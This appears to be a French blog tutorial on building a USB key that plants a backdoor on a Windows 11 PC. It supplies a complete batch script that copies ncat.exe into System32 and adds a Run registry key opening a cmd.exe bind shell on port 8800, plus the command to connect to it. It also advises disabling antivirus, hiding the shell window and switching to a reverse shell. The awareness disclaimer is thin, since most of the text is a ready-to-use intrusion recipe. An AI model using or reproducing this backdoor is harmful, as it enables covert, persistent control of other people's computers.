Créer une clé USB backdoor pour contrôler un PC distant
Si tu t’intéresses un peu à la cybersécurité, tu as sûrement déjà vu passer des démonstrations de clés USB capables de lancer des scripts ou d’ouvrir une connexion à distance. Avec les systèmes récents comme Windows 11, les choses ont bien évolué.
Mais certaines méthodes restent efficaces — tant qu’on les utilise intelligemment.
Dans ce guide, on va voir comment créer une clé USB qui, une fois branchée, installe une backdoor simple et fonctionnelle. Une fois la machine redémarrée, tu pourras y accéder à distance via un shell.
Comme d'habitude, l’objectif de ce tutoriel est de montrer aux dirigeants d’entreprise à quel point l’utilisation des clés USB peut être dangereuse. Ce qui est valable pour les entreprises l’est tout autant pour les particuliers.
🧰 Ce dont tu as besoin
- Une clé USB
- Un ordinateur cible sous Windows 11 (VM ou PC de test)
- Les droits administrateur sur cette machine
- L’outil Netcat (Netcat moderne, inclus avec Nmap)
- Une machine distante sur le même réseau pour établir la connexion
🔧 Étapes de création
1. Préparer la clé USB
Crée un dossier sur ta clé, par exemple :
USB:\backdoor_demo\
Place dedans :
ncat.exe(récupéré depuis l’installation de Nmap)- Un fichier
install_backdoor.batque tu vas créer dans l’étape suivante
2. Créer le script batch
Dans ce même dossier, crée un fichier nommé install_backdoor.bat, avec le contenu suivant :
:: Vérifie les droits administrateur
net session >nul 2>&1
if %errorlevel% neq 0 (
echo [!] Ce script doit être exécuté en tant qu'administrateur.
pause
exit /b
):: Copie Ncat dans System32
copy /Y ncat.exe %SystemRoot%\System32\ncat.exe >nul:: Ajoute une entrée dans le registre pour lancer la backdoor au démarrage
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ncat_backdoor" /t REG_SZ /d "ncat.exe -d -L -e cmd.exe -p 8800" /fecho [+] La backdoor est en place et sera active au prochain démarrage.
pause
Ce script :
- Vérifie que tu es bien en mode administrateur
- Copie
ncat.exedans le répertoire système de Windows - Ajoute une commande dans le registre pour lancer un shell au démarrage
Tu n’as plus qu’à exécuter ce script manuellement, clic droit > Exécuter en tant qu’administrateur.
3. Écouter la connexion à distance
Une fois que la machine cible a redémarré, la backdoor sera active et à l’écoute sur le port 8800.
Sur ta machine distante, ouvre un terminal et tape la commande suivante :
ncat [IP_de_la_cible] 8800
Remplace [IP_de_la_cible] par l’adresse IP réelle de la machine cible.
Tu obtiens alors un accès direct à son invite de commandes Windows, comme si tu étais devant elle.
Et voilà ! Avec cette technique tu seras en mesure de prendre le contrôle d'un PC à distance. Tu peux faire ce qui tu veux : ouvrir des fichiers, lancer une recherche, exécuter un programme...
Voici une liste des commandes pour bien manipuler la machine à distance: Lise des commandes Windows.
Pour te déconnecter, tape « logout » .
🔒 Quelques remarques utiles
- Le port
8800est arbitraire. Tu peux en choisir un autre si nécessaire. - Le binaire
ncat.exepeut être détecté par l’antivirus. Pour un test en labo, désactive temporairement la protection en temps réel. - Cette méthode fonctionne uniquement si la machine cible et la machine d’attaque sont sur le même réseau local (par exemple, le même Wi-Fi ou routeur).
Si elles sont sur des réseaux différents (Internet), il faut utiliser une variante en reverse shell. - Si tu veux éviter que la session soit trop visible, tu peux masquer la fenêtre du shell ou utiliser une version PowerShell en arrière-plan.
- Tu peux aussi décliner cette méthode avec un payload Python ou un exécutable compilé, si tu veux aller plus loin.
Conclusion
On pourrait croire qu’avec toutes les mises à jour de Windows, les clés USB ne présentent plus de danger… mais comme tu viens de le voir, certaines techniques restent possibles si la personne en face manque de vigilance.
Ce tuto n’est pas là pour apprendre à pirater, mais pour montrer concrètement ce qui reste dangereux aujourd’hui. Comprendre, c’est mieux se défendre.
Faites-en bon usage.
Avez-vous trouvé ce guide utile ?
Nous aimerions connaître votre avis pour améliorer nos tutoriels. Avez-vous trouvé ce guide utile ?